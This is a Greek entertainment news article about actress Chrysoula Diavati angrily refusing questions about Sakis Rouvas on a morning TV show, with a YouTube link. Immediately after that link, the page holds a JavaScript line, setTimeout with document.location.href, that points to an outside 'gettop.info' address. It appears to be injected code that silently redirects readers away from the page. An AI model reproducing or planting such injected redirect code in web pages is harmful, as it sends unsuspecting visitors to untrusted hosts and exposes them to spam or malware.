Δεν έκρυψε τα νεύρα της η Διαβάτη on air: Ξέρω εγώ και δεν πηγαίνω σε εκπομπές (BINTEO)

0
13

 

Την ψυχραιμία της έχασε η γνωστή ηθοποιός Χρυσούλα Διαβάτη όταν καλεσμένη το πρωί της Δευτέρας στην εκπομπή «Έτοιμο το πρωινό» στον τηλεοπτικό σταθμό «Ε» εκνευρίστηκε με ερωτήσεις που της έκαναν και μάλσιτα όπως ανέφερε η ίδια μετάνιωσε που πήγε στο στούντιο.

Η αρχή έγινε όταν οι δημοσιογράφοι ρώτησαν την Χρυσούλα Διαβάτη σχετικά με άλλους καλλιτέχνες από διαφορετικούς χώρους που ασχολούνται με την υποκριτική. «Είμαι 55 χρόνια ηθοποιός και ακόμα δεν λέω ότι είμαι ηθοποιός.
Η τηλεόραση έκανε μεγάλο κακό και έχει πάρει μεγάλο κατήφορο. Άντε πάλι με αυτό το θέμα. Καταλάβατε τώρα γιατί δεν πάω σε εκπομπές… γιατί όλοι το γυρίζουν και μου βάζουν στο στόμα μου λόγια τα οποία δεν έχω πει ποτέ. Σιχαίνομαι τα social media. Μπορεί οποιοσδήποτε να κάνει οτιδήποτε; Μπορώ εγώ να κάνω οτιδήποτε. Πρέπει να αποδείξεις τι είσαι«.

Όταν ρωτήθηκε συγκεκριμένα για τον Σάκη Ρουβά, σε βάρος του οποίου στο παρελθόν η αγαπημένη ηθοποιός είχε εξαπολύσει επίθεση για την υποκριτική του, έγινε έξαλλη: «Καλά κάνετε και είστε θαυμάστριά του, μπορείτε να μην αναφέρεστε σε αυτά τα πράγματα; Να πούμε άλλα πράγματα… Γιατί δεν θα ερχόμουν αν ήξερα ότι υπήρχε μια κυρία εδώ που θα… Όχι γιατί… Κι εγώ ευγενική είμαι. Δεν σας έδειρα…Ειλικρινά δεν θα ερχόμουν αν ήξερα ότι θα ήταν εδώ αυτή η κυρία. Μπορεί να μην με εκνευρίζετε πρωί πρωί; Ήρθα εδώ γι’αυτό το ζευγάρι (Καραβάτου -Κατσούλης) που εκτιμώ και σέβομαι».

https://www.youtube.com/watch?v=dLnfe0OKp4w setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here